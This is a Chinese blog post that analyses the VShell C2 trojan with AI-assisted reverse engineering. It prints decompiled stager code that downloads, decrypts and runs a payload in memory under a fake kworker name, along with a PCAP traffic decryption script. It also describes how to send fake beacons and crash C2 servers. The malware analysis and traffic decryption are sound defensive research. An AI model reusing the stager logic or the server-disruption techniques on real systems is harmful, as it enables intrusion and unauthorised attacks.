用 AI 杀死那个 VShell

First Post:
Last Update:
Word Count: 6.5k
Read Time: 33min

Intro 引入

最近闲来无事,想到既然有 Codex 和 Github Copilot Pro 就拿来尝试做一些力所能及的逆向工作。第一个目标便是国人最爱的“开源” C2 —— VShell。

From Trojan to Trojan

作为一个破解版遍地的地方,你可以很轻易的获取到对应的软件本体。VShell 本身被加入了混淆,相对于服务器本体而言,生成的木马本体更为简单,于是拖进 IDA,启动 IDA-PRO-MCP。

本篇以 ws 协议 linux amd64 木马为例子进行解释。

Stager 一阶段木马

通常来说 VShell 木马上线方式为一个快速上线的代码,在监听器创建的时候会生成一个诸如
/slt /swt /slw /sww 的 HTTP 端点,可以让黑客使用 certutil 和 curl 下载脚本后执行木马上线。

其中二次上线的 url 形如 http://host:port/?h=hostname&p=80&t=ws&a=l64&stage=true 的下载 stage 的 url 这些参数均可以修改 均可以正常下载。

上线的木马为第一阶段木马,作为第一阶段的木马,他非常简单,其实就是一个 dropper 下载正式木马后进行内存加载。

对 Linux 来说 它是这样的。

1
2
3
4
5
6
7
int __fastcall main(int argc, const char **argv, const char **envp)
{
/* args define */

if ( !access("/tmp/log_de.log", 0) ) # check /tmp/log_de.log exists
exit(0);

初始化 获取 /tmp/log_de.log 文件是否存在,如果文件存在access 返回 0 -> 条件为真 -> 执行 exit(0) -> 程序直接结束

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
*(_QWORD *)&addr.sa_family = 405798914;
*(_QWORD *)&addr.sa_data[6] = 0;
hostbyname = gethostbyname("xxx.xxx.xxx.xxx");
if ( hostbyname )
v4 = **(_DWORD **)hostbyname->h_addr_list;
else
v4 = inet_addr("xxx.xxx.xxx.xxx");
*(_DWORD *)&addr.sa_data[2] = v4;
fd = socket(2, 1, 0);
fd_1 = fd;
if ( fd >= 0 )
{
optval = 10;
setsockopt(fd, 6, 7, &optval, 4u);
while ( connect(fd_1, &addr, 0x10u) == -1 )
sleep(0xAu);
// 保持链接 直到连上为止
v7 = (unsigned __int16)__ROR2__(*(_WORD *)addr.sa_data, 8);
sprintf(
s,
"GET /?a=%s&h=%s&t=%s&p=%d HTTP/1.1\r\n"
"Host: %s:%d\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0\r\n"
"\r\n",
"l64", // 客户端类型
"xxx.xxx.xxx.xxx", // host
"ws_", // 协议
v7,
"xxx.xxx.xxx.xxx", // host
(unsigned __int16)v7);
send(fd_1, s, 0x400u, 0);
s_1 = s;
for ( i = 256; i; --i )
{
*(_DWORD *)s_1 = 0;
s_1 += 4;
}
for ( j = 0; ; j += v11 )
{
v11 = recv(fd_1, buf, 1u, 0);
if ( v11 <= 0 )
break;
v12 = buf[0] == 10;
buf[j] = buf[0];
if ( v12 && buf[j - 1] == 13 && buf[j - 2] == 10 && buf[j - 3] == 13 )
break;
}

初始化代码 通过 socket tcp 直接发起 http 指定格式报文,然后循环获取对应的字符

1
2
3
4
GET /?a={l64}&h={host}&t={ws_}&p={port} HTTP/1.1\r\n
Host: {host}:{port}\r\n
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0\r\n
\r\n

然后程序就创建内存文件接受服务器传输的数据 并且逐字符解密 xor 0x99 解密

syscall 319 即位 memfd_create syscall

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
fd_2 = syscall(319, "a", 1);
if ( fd_2 >= 0 )
{
while ( 1 )
{
n = recv(fd_1, buf_1, 0x1000u, 0);
if ( n <= 0 )
break;
buf_2 = buf_1;
do
*buf_2++ ^= 0x99u; # 解密 shellcode
while ( (int)((_DWORD)buf_2 - (unsigned int)buf_1) < n );
write(fd_2, buf_1, n);
}
n1024 = 1024;
buf_3 = buf_1;
while ( n1024 )
{
*buf_3++ = 0;
--n1024;
}

设置环境变量 伪装内存 process name 为 [kworker/0:2] 并且使用 fexecve 执行文件

1
2
3
4
5
6
7
8
9
10
11
      close(fd_1);
realpath(*argv, resolved);
setenv("CWD", resolved, 1);
argva[0] = "[kworker/0:2]";
argva[1] = 0;
fexecve(fd_2, argva, _bss_start);
close(fd_1);
}
}
return 0;
}

Staged 主要木马

通过在 gdb 中对 fexecve 下端点,我们可以轻易地在 /proc/{pid}/fd/4 ==> “a” 中得到执行前的 elf 文件。

通过对该 elf 文件进行分析,我们可以看到该文件本质是一个完全上线的 VShell 二阶段木马,也是最主要的核心客户端。

根据基本的信息查看,文件存在一些很强的 go 特征,包括 .go.buildinfo .gosymtab .gopclntab 。那就废话不多说,直接拖进 IDA 9.2 打开 MCP,codex 启动!

基础的 Agents.md 如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# Decompiler Agents 

Your task is to create a complete and comprehensive reverse engineering analysis. Reference GOALS.md to understand the project goals and ensure the analysis serves our purposes.

Use the following systematic methodology:

1. **Decompilation Analysis**
- Thoroughly inspect the decompiler output
- Add detailed comments documenting your findings
- Focus on understanding the actual functionality and purpose of each component (do not rely on old, incorrect comments)

2. **Improve Readability in the Database**
- Rename variables to sensible, descriptive names
- Correct variable and argument types where necessary (especially pointers and array types)
- Update function names to be descriptive of their actual purpose

3. **Deep Dive When Needed**
- If more details are necessary, examine the disassembly and add comments with findings
- Document any low-level behaviors that aren't clear from the decompilation alone
- Use sub-agents to perform detailed analysis

4. **Important Constraints**
- NEVER convert number bases yourself - use the int_convert MCP tool if needed
- Use MCP tools to retrieve information as necessary
- Derive all conclusions from actual analysis, not assumptions

5. **Documentation**
- Produce comprehensive REVERSE/*.md files with your findings
- Document the steps taken and methodology used
- When asked by the user, ensure accuracy over previous analysis file
- Organize findings in a way that serves the project goals outlined in GOALS.md
- All document should be Chinese simplified.
- ensure all documentation is clear, comprehensive, and accessible for future reference.

6. **Scripting**
- [IMPORTANT] Don't writing any scripts with terminal commands. like `python << PYEOF` or `echo "script content" > script.py`, directly add a tempwork.py file and use uv to run it or terminal will be broken.
- write scripts and save them directly as files in scripts/ directory.
- run or play any python scripts with UV, like `uv run scripts/decrypt.py`.
- Ensure scripts are well-documented and maintainable.
- DON'T USE/REFERENCE OTHER scripts when u analyze with IDA. They could be wrong or outdated.

7. **Golang Reversing** [IMPORTANT]
- [IMPORTANT] Golang will pack a lot of methods into a single file. Make sure to break them down logically. Golang will contain function that are not used.
- [IMPORTANT] You need to identify the entrypoints and the main flow of the program first, then follow the calls from there.
- [IMPORTANT] Strings for Golang are stored in a special way, they store like a pointer to the data and the length. So be careful when you see strings in Golang, they might not be what they seem.

GOALS.md

1
2
3
4
5
6
7
8
9
10
11
12
## Goals

1. completely understand the functionality and purpose of the target software.
> This should be FUNCTIONALITY.md
2. completely document everything about its traffic patterns, protocols, and data structures.
> This should be TRAFFIC.md
3. completely document the internal workings of the software, including algorithms, data flows, and architecture.
> This should be ARCHITECTURE.md
4. produce a decryption python script to decode its traffic for further analysis and detection or defense purposes.
> This should be decrypt.py
5. if it has embed configuration data, extract and decrypt that configuration data.
> This should be covered in EXECUTION_FLOW.md and decrypt.py

然后就可以开始 vibe 了。

执行流程从 runtime_main 开始,启动 go runtime 初始化,之后通过 call rax 进入真实的主函数。

主函数的逻辑主要为 环境检查 -> 配置加载 -> 根据模式进行的上线逻辑,应该是对应不同的启动停止方式。 例如 listen 类型的客户端和 reverse 类型的客户端。

环境检查

环境检查函数存在分析失败的可能,检查其中的汇编指令,他会检查 log_de.log 文件 (其实是上面提及的 /tmp/log_de.log 和 log_de-0.log文件)

第三个文件就比较特殊了

/home/vbccsb 目录,其本质是 微步云沙箱目录,在发现该目录存在的时候,程序也会进行自杀。

配置加载

配置加载使用 golang embedFS 能力将配置文件加密后的数据一并打包加入二进制文件,然后通过 aes_cbc_pkcs7_decrypt 模式解密对应的配置文件。其中加密的 key 与 iv 均为同一个,且为该配置块的前 16 字节。最后通过 JSON Unmarshal 进行反序列化。

其解析出来的配置文件结构体如下

1
2
3
4
5
6
7
8
9
10
11
{
"server": "ws://xxxxxx:xx", // remote C2 server address
"type": "ws", // traffic type
"vkey": "qwe123qwe", // verify key
"proxy": "", // via proxy
"salt": "qwe123qwe", // traffic encryption salt
"l": false, // listen mode
"e": false, // payload encode/encryption
"d": 30, // delay
"h": 10 // heartbeat interval
}

在完成具体的配置加载后便会开始按照这个配置正常进行上线。

上线流程

上线流程主要分为两种模式 listen 和 reverse。 我们主要分析 reverse 模式。

在其中 reverse 模式下,根据配置,会开始尝试链接远程 C2 服务器,

这块的代码会非常多。但是经过 AI 配合一起协同逆向之后,我们可以看到其主要逻辑为:

针对 websocket 类型的流量进行上线。

  1. 采集 hostname username os version 网卡 ip 进程名称等基础信息
  2. 创建 TCP 链接
  3. 发送伪装的 Websocket Upgrade 报文
  4. 启动加密 AESGCM 模式进行加密 下面是加密前的明文
  5. 在 TCP 层面,(不是 websocket 的协议)发送两次 \x05\x00\x00\x004.9.3 版本号为握手包
  6. 等待服务器响应 md5(4.9.3) 的 hash 作为响应 并发起 vkey 挑战
  7. 发送 vkey md5 hash 响应挑战
  8. 上报 conf + 主机信息长度(4 字节小端 int)+ 主机信息 json
  9. 服务器发送 VerifyKey 作为后续的 session
  10. 等待服务器下发命令

比较有意思的一点是 vshell 居然是使用 tcp 伪装的 websocket,导致发送的数据包全是 tcp 数据而非正常的 websocket 包格式,其中的 websocket unmask 全是无效的。

其中包格式为

包的大致格式为 四字节小端长度(绿色部分) + 数据

其中数据包含 nonce 12字节 (蓝色部分) + 密文 (黄色部分 可变长) + 额外数据(红色部分 16 字节)

密文通过 AESGCM 模式加密 nonce 为 iv 密钥为 salt 的 md5

nonce 也有一些说明,nonce 的首位客户端发送的报文首位小于 0x80, 服务端则大于 0x80

在客户端中通过 and 0x7F 进行自动处理

上面的报文内容为字节的服务器返回的 sucs 包

而通过 conf 模式,上报的信息形如

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
 {
"Id": 0,
"IsConnect": False,
"VerifyKey": "",
"Tp": "ws",
"Addr": "",
"Remark": "",
"Status": False,
"LocalIP": "网卡 IP",
"UserName": "root",
"HostName": "xxxx.local",
"Location": "",
"OsName": "linux",
"ProcessName": "[kworker/0:2]",
"PingCheckTime": 0,
"NoStore": False,
"NoDisplay": False,
"MaxConn": 0,
"NowConn": 0
}

之后便会进入命令处理循环和 heartbeat 循环,等待服务器下发命令进行处理。

如果你非常熟悉 nps 这个反代工具,那么你会发现它所采用的协议与命令分发模式类似于 nps,代码在

https://github.com/ehang-io/nps/blob/master/bridge/bridge.go#L228

所以我个人比较怀疑 VShell 的作者也就是 veo 极有可能复制了 nps 的代码,并且以此为基础开发了 vshell 。

PCAP Decrypter

清楚原理以及其上线过程后,我们就可以尝试解析抓包的 pcap 包。 简单的放上我这里 vibe 出来的脚本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
#!/usr/bin/env python3
# /// script
# requires-python = ">=3.8"
# dependencies = [
# "cryptography",
# ]
# ///

"""
C2 PCAP 解密工具

从 config.json 读取加密参数,使用 tshark 从 PCAP 文件提取并解密 C2 流量。

使用方法:
uv run scripts/decrypt_pcap.py <pcap_file> -c <config_file>

示例:
uv run scripts/decrypt_pcap.py cleaned.pcap -c decrypted_config.json
uv run scripts/decrypt_pcap.py cleaned.pcap -c decrypted_config.json -o result.json

加密参数 (从逆向分析得出):
- 算法: AES-256-GCM
- 密钥: md5(salt).hexdigest().encode('ascii') (32 字节)
- Nonce: 12 字节 (消息前缀)
- Tag: 16 字节 (消息后缀)
- 消息格式: [4字节LE长度][nonce 12字节][ciphertext][tag 16字节]

依赖:
- tshark (Wireshark CLI) 用于 PCAP 解析
"""

import argparse
import hashlib
import json
import struct
import subprocess
import sys
from pathlib import Path
from dataclasses import dataclass, field
from typing import Optional, List, Tuple
from urllib.parse import urlparse

from cryptography.hazmat.primitives.ciphers.aead import AESGCM


@dataclass
class Config:
"""C2 配置"""
salt: str
vkey: str
server: str
server_ip: str
server_port: int
conn_type: str # ws, tcp, etc.

@classmethod
def from_json(cls, config_path: str) -> 'Config':
"""从 JSON 文件加载配置"""
with open(config_path, 'r') as f:
data = json.load(f)

# 解析服务器地址
server = data.get('server', '')
parsed = urlparse(server)

if parsed.hostname:
server_ip = parsed.hostname
server_port = parsed.port or 80
else:
# 尝试直接解析 ip:port 格式
parts = server.replace('ws://', '').replace('tcp://', '').split(':')
server_ip = parts[0] if parts else ''
server_port = int(parts[1]) if len(parts) > 1 else 80

return cls(
salt=data.get('salt', ''),
vkey=data.get('vkey', ''),
server=server,
server_ip=server_ip,
server_port=server_port,
conn_type=data.get('type', 'ws')
)

def get_encryption_key(self) -> bytes:
"""获取 AES-256 加密密钥"""
# md5(salt) 返回十六进制字符串作为密钥
md5_hex = hashlib.md5(self.salt.encode()).hexdigest()
return md5_hex.encode('ascii') # 32 字节

def get_vkey_hash(self) -> str:
"""获取 vkey 的 MD5 哈希 (用于验证)"""
return hashlib.md5(self.vkey.encode()).hexdigest()


@dataclass
class EncryptedMessage:
"""加密消息"""
src_port: int
dst_port: int
data: bytes
direction: str = 'unknown' # 'C2S' (Client→Server) 或 'S2C' (Server→Client)

@property
def nonce(self) -> bytes:
return self.data[:12]

@property
def ciphertext_with_tag(self) -> bytes:
return self.data[12:]

@property
def direction_arrow(self) -> str:
"""方向箭头符号"""
return '→' if self.direction == 'C2S' else '←' if self.direction == 'S2C' else '?'

@property
def direction_label(self) -> str:
"""方向标签"""
if self.direction == 'C2S':
return 'Client → Server'
elif self.direction == 'S2C':
return 'Server → Client'
return 'Unknown'


class PcapDecryptor:
"""PCAP 解密器"""

NONCE_SIZE = 12
TAG_SIZE = 16
LENGTH_SIZE = 4

def __init__(self, config: Config):
self.config = config
self.key = config.get_encryption_key()
self.aesgcm = AESGCM(self.key)

def extract_websocket_payload(self, data: bytes) -> Optional[bytes]:
"""从 WebSocket 帧中提取 payload"""
if len(data) < 2:
return None

# WebSocket 帧格式
opcode = data[0] & 0x0F
masked = (data[1] & 0x80) != 0
payload_len = data[1] & 0x7F

offset = 2

if payload_len == 126:
if len(data) < 4:
return None
payload_len = struct.unpack('>H', data[2:4])[0]
offset = 4
elif payload_len == 127:
if len(data) < 10:
return None
payload_len = struct.unpack('>Q', data[2:10])[0]
offset = 10

if masked:
if len(data) < offset + 4:
return None
mask_key = data[offset:offset+4]
offset += 4

if len(data) < offset + payload_len:
return None

# 解除掩码
payload = bytearray(data[offset:offset+payload_len])
for i in range(len(payload)):
payload[i] ^= mask_key[i % 4]
return bytes(payload)
else:
if len(data) < offset + payload_len:
return None
return data[offset:offset+payload_len]

def extract_tcp_payloads_tshark(self, pcap_path: str) -> List[dict]:
"""使用 tshark 提取 TCP payloads,保持时间顺序"""
try:
# 添加 frame.number 以保持时间顺序
result = subprocess.run(
['tshark', '-r', pcap_path, '-T', 'fields',
'-e', 'frame.number', '-e', 'tcp.srcport', '-e', 'tcp.dstport', '-e', 'tcp.payload',
'-Y', 'tcp.payload'],
capture_output=True, text=True
)

# 按帧号排序的数据包列表
packets = []

for line in result.stdout.strip().split('\n'):
if not line:
continue

# 处理制表符分隔的格式: frame_num \t src_port \t dst_port \t payload
parts = line.split('\t')
if len(parts) < 4:
# 尝试空格分隔
parts = line.split(None, 3)

if len(parts) < 4:
continue

try:
frame_num = int(parts[0])
src_port = int(parts[1])
dst_port = int(parts[2])
except ValueError:
continue

payload_hex = parts[3].replace(':', '').strip()

if not payload_hex:
continue

try:
payload = bytes.fromhex(payload_hex)
except ValueError:
continue

# 确定方向
if dst_port == self.config.server_port:
direction = 'C2S' # Client → Server
elif src_port == self.config.server_port:
direction = 'S2C' # Server → Client
else:
direction = 'unknown'

packets.append({
'frame': frame_num,
'src_port': src_port,
'dst_port': dst_port,
'direction': direction,
'payload': payload
})

# 按帧号排序
packets.sort(key=lambda x: x['frame'])

return packets

except FileNotFoundError:
print("错误: 需要安装 tshark (Wireshark CLI)", file=sys.stderr)
sys.exit(1)

def extract_messages(self, pcap_path: str) -> List[EncryptedMessage]:
"""从 PCAP 提取加密消息,保持时间顺序"""

# 使用 tshark 提取 TCP payloads (按帧号排序)
packets = self.extract_tcp_payloads_tshark(pcap_path)

if not packets:
return []

# 每个流的 buffer: key = (src_port, dst_port)
stream_buffers = {}

messages = []

# 按时间顺序处理每个包
for pkt in packets:
key = (pkt['src_port'], pkt['dst_port'])

if key not in stream_buffers:
stream_buffers[key] = {
'buffer': bytearray(),
'direction': pkt['direction'],
'http_skipped': False
}

stream = stream_buffers[key]
stream['buffer'].extend(pkt['payload'])

# 跳过 HTTP 握手部分 (WebSocket 升级请求) - 只处理一次
if not stream['http_skipped']:
raw_data = bytes(stream['buffer'])
http_end = raw_data.find(b'\r\n\r\n')
if http_end != -1 and (raw_data.startswith(b'GET ') or raw_data.startswith(b'HTTP/')):
stream['buffer'] = bytearray(raw_data[http_end + 4:])
stream['http_skipped'] = True

# 尝试从 buffer 中提取完整消息
self._extract_complete_messages(stream, pkt['src_port'], pkt['dst_port'], messages)

return messages

def _extract_complete_messages(self, stream: dict, src_port: int, dst_port: int, messages: list):
"""从 buffer 中提取所有完整的消息"""
buffer = stream['buffer']
direction = stream['direction']

while len(buffer) >= 4:
msg_len = struct.unpack('<I', buffer[:4])[0]

# 检查合理性
if msg_len > 100000 or msg_len < self.NONCE_SIZE + self.TAG_SIZE:
# 无效长度,跳过一个字节
del buffer[0]
continue

total_len = 4 + msg_len
if len(buffer) < total_len:
# 消息不完整,等待更多数据
break

msg_data = bytes(buffer[4:total_len])

messages.append(EncryptedMessage(
src_port=src_port,
dst_port=dst_port,
data=msg_data,
direction=direction
))

# 移除已处理的数据
del buffer[:total_len]

def decrypt_message(self, msg: EncryptedMessage) -> Tuple[Optional[bytes], Optional[str]]:
"""解密单条消息"""
if len(msg.data) < self.NONCE_SIZE + self.TAG_SIZE:
return None, "消息太短"

try:
plaintext = self.aesgcm.decrypt(msg.nonce, msg.ciphertext_with_tag, None)
return plaintext, None
except Exception as e:
return None, str(e)

def analyze_plaintext(self, plaintext: bytes) -> dict:
"""分析明文内容"""
result = {
'raw': plaintext,
'type': 'unknown',
'content': None,
}

try:
text = plaintext.decode('utf-8')
result['text'] = text

# 检查是否是版本号
stripped = text.strip('\x00').strip()
if stripped.count('.') == 2 and len(stripped) <= 10:
try:
parts = stripped.split('.')
if all(p.isdigit() for p in parts):
result['type'] = 'version'
result['content'] = stripped
return result
except:
pass

# 检查是否是 MD5 哈希 (32 字符十六进制)
if len(text) == 32 and all(c in '0123456789abcdef' for c in text):
result['type'] = 'hash'
result['content'] = text
# 检查是否是 vkey 哈希
if text == self.config.get_vkey_hash():
result['is_vkey_hash'] = True
return result

# 检查是否是隧道类型
if text in ('conf', 'main', 'chan', 'file', 'health'):
result['type'] = 'tunnel_type'
result['content'] = text
return result

# 检查是否包含 JSON
if text.startswith('{') or (text.startswith('conf#') or text.startswith('main#')):
result['type'] = 'json_data'
if '#' in text:
prefix, json_str = text.split('#', 1)
result['prefix'] = prefix
try:
result['content'] = json.loads(json_str)
except json.JSONDecodeError:
result['content'] = json_str
else:
try:
result['content'] = json.loads(text)
except json.JSONDecodeError:
result['content'] = text
return result

result['type'] = 'text'
result['content'] = text

except UnicodeDecodeError:
result['type'] = 'binary'
result['content'] = plaintext.hex()
result['length'] = len(plaintext)
parsed_data = []
try:
len_plain = len(plaintext)
lener = struct.unpack('<I', plaintext[0:4])[0]
content = plaintext[4:]

# args_len = struct.unpack('<I', plaintext[1:5])[0]
parsed_data = {
'len': lener,
'content': content.decode(errors='ignore')
}
try:
json_content = json.loads(content.decode())
parsed_data['json_content'] = json_content
except:
pass
except Exception as e:
parsed_data = {
'error': str(e)
}
result['parsed'] = parsed_data
return result


def print_report(config: Config, messages: List[EncryptedMessage],
decryptor: PcapDecryptor, output_json: str = None):
"""打印解密报告"""

print("=" * 70)
print("C2 流量解密报告")
print("=" * 70)

print(f"\n📋 配置信息:")
print(f" Salt: {config.salt}")
print(f" VKey: {config.vkey}")
print(f" VKey MD5: {config.get_vkey_hash()}")
print(f" 服务器: {config.server}")
print(f" 服务器 IP: {config.server_ip}")
print(f" 服务器端口: {config.server_port}")

print(f"\n🔐 加密参数:")
print(f" 算法: AES-256-GCM")
print(f" 密钥 (hex): {config.get_encryption_key().hex()}")
print(f" 密钥 (ASCII): {config.get_encryption_key().decode()}")

print(f"\n📊 消息统计:")
print(f" 提取消息数: {len(messages)}")

# 按方向统计
c2s_count = sum(1 for msg in messages if msg.direction == 'C2S')
s2c_count = sum(1 for msg in messages if msg.direction == 'S2C')
print(f" 📤 Client → Server: {c2s_count}")
print(f" 📥 Server → Client: {s2c_count}")

# 按端口分组
ports = set(msg.src_port for msg in messages)
print(f" 来源端口: {sorted(ports)}")

results = []

print("\n" + "=" * 70)
print("解密结果")
print("=" * 70)

for i, msg in enumerate(messages, 1):
plaintext, error = decryptor.decrypt_message(msg)

# 方向指示
dir_icon = '📤' if msg.direction == 'C2S' else '📥' if msg.direction == 'S2C' else '❓'
print(f"\n--- 消息 {i} {dir_icon} {msg.direction_label} ({msg.src_port}{msg.dst_port}, {len(msg.data)} 字节) ---")
print(f" Nonce: {msg.nonce.hex()}")

result = {
'index': i,
'direction': msg.direction,
'direction_label': msg.direction_label,
'src_port': msg.src_port,
'dst_port': msg.dst_port,
'size': len(msg.data),
'nonce': msg.nonce.hex(),
}

if plaintext:
analysis = decryptor.analyze_plaintext(plaintext)
result['status'] = 'success'
result['plaintext_size'] = len(plaintext)
result['type'] = analysis['type']

print(f" ✅ 解密成功 ({len(plaintext)} 字节)")
print(f" 类型: {analysis['type']}")

if analysis['type'] == 'version':
print(f" 版本: {analysis['content']}")
result['content'] = analysis['content']

elif analysis['type'] == 'hash':
is_vkey = analysis.get('is_vkey_hash', False)
print(f" 哈希: {analysis['content']}")
if is_vkey:
print(f" ⚠️ 匹配 vkey 的 MD5 (验证令牌)")
result['content'] = analysis['content']
result['is_vkey_hash'] = is_vkey

elif analysis['type'] == 'tunnel_type':
print(f" 隧道: {analysis['content']}")
result['content'] = analysis['content']

elif analysis['type'] == 'json_data':
if 'prefix' in analysis:
print(f" 前缀: {analysis['prefix']}")
result['prefix'] = analysis['prefix']
if isinstance(analysis['content'], dict):
print(f" JSON:")
print(f" {json.dumps(analysis['content'], indent=4, ensure_ascii=False)}")
else:
print(f" 内容: {analysis['content']}")
result['content'] = analysis['content']

elif analysis['type'] == 'binary':
print(f" 二进制: {analysis['content']}")
result['content'] = analysis['content']
result['parsed'] = analysis.get('parsed', {})
print(f" 解析: {analysis.get('parsed', {})}")

else:
text = analysis.get('text', analysis.get('content', plaintext.hex()))
print(f" 内容: {repr(text)}")
result['content'] = text

else:
print(f" ❌ 解密失败: {error}")
result['status'] = 'failed'
result['error'] = error

results.append(result)

# 输出 JSON
if output_json:
output_data = {
'config': {
'salt': config.salt,
'vkey': config.vkey,
'vkey_md5': config.get_vkey_hash(),
'server': config.server,
},
'encryption': {
'algorithm': 'AES-256-GCM',
'key_hex': config.get_encryption_key().hex(),
'key_ascii': config.get_encryption_key().decode(),
},
'messages': results
}

with open(output_json, 'w', encoding='utf-8') as f:
json.dump(output_data, f, indent=2, ensure_ascii=False)
print(f"\n📁 结果已保存到: {output_json}")

# 打印协议摘要
print("\n" + "=" * 70)
print("协议摘要")
print("=" * 70)

tunnel_types = {}
versions = set()
hashes = []
host_info = None

for r in results:
if r.get('status') != 'success':
continue

msg_type = r.get('type')
content = r.get('content')

if msg_type == 'version':
versions.add(content)
elif msg_type == 'hash':
hashes.append({
'hash': content,
'is_vkey': r.get('is_vkey_hash', False)
})
elif msg_type == 'tunnel_type':
tunnel_types[content] = tunnel_types.get(content, 0) + 1
elif msg_type == 'json_data' and isinstance(content, dict):
if 'LocalIP' in content or 'HostName' in content:
host_info = content

if versions:
print(f"\n📌 客户端版本: {', '.join(versions)}")

if tunnel_types:
print(f"\n📡 隧道类型统计:")
for t, count in tunnel_types.items():
print(f" - {t}: {count} 次")

if hashes:
print(f"\n🔑 验证令牌:")
for h in hashes:
mark = " (vkey)" if h['is_vkey'] else ""
print(f" - {h['hash']}{mark}")

if host_info:
print(f"\n🖥️ 受害主机信息:")
for key in ['LocalIP', 'UserName', 'HostName', 'OsName', 'ProcessName']:
if key in host_info:
print(f" {key}: {host_info[key]}")


def main():
parser = argparse.ArgumentParser(
description='从 PCAP 文件解密 C2 流量',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
示例:
%(prog)s cleaned.pcap -c decrypted_config.json
%(prog)s cleaned.pcap -c decrypted_config.json -o decrypted.json
"""
)

parser.add_argument('pcap', help='PCAP 文件路径')
parser.add_argument('-c', '--config', required=True, help='配置文件路径 (JSON)')
parser.add_argument('-o', '--output', help='输出 JSON 文件路径')

args = parser.parse_args()

# 检查文件
if not Path(args.pcap).exists():
print(f"错误: PCAP 文件不存在: {args.pcap}", file=sys.stderr)
sys.exit(1)

if not Path(args.config).exists():
print(f"错误: 配置文件不存在: {args.config}", file=sys.stderr)
sys.exit(1)

# 加载配置
print(f"📖 加载配置: {args.config}")
config = Config.from_json(args.config)

# 创建解密器
decryptor = PcapDecryptor(config)

# 提取消息
print(f"📦 解析 PCAP: {args.pcap}")
messages = decryptor.extract_messages(args.pcap)

if not messages:
print("⚠️ 未找到加密消息")
sys.exit(1)

# 打印报告
print_report(config, messages, decryptor, args.output)


if __name__ == '__main__':
main()

Fake Beacon

清楚原理以及其上线过程后,我们也还可以创建一个假的信标以实施针对任意 vshell 的虚假上线以及骚扰。

这里额外发现了两处 VShell server 处理上的 bug

VShell beacon config overwrite

还记得上面提及的 vshell 处理的 conf 的 json 么。

我们通过设置 conf 中的 ID 可以覆盖服务器端上的固定 id 的 beacon 数据,该数据会被存储到服务器的数据库与后端缓存中,因此可以使得后端和真实上线的 beacon 被服务器拒绝链接。 包括 我们可以覆盖 remark process name 部分让服务器显示出我们想要说的东西。例如 fuck u bitch

例如:

一开始的类似

虚假上线 上报虚假信息

上线一个 id 为 1 进程名称为 Fuck you bitch 的客户端

甚至我们可以覆盖并且恶意增加大量的虚假客户端,迫使服务器拒绝与切断所有的 session 并且在服务器中发送警告文本。

Shutdown the service

最后我们拥有多种方式使得服务器进行崩溃,例如 当我们在上面验证上线的第八步时,修改长度为错误的长度的时候,便会导致服务器卡死,最后杀死 TCP 链接的时候便会导致服务全部崩溃。

  1. 上报 conf + 主机信息长度(4 字节小端 int)+ 主机信息 json

此外我们还可以使用 file 发送类似的错误 json 和长度,也可以导致服务器在分发新任务的时候自我崩溃。

End Word

作为结束语,VShell 的分析之旅从尝试利用 AI 辅助逆向开始,到最终实现流量完全解密与服务端反制结束。

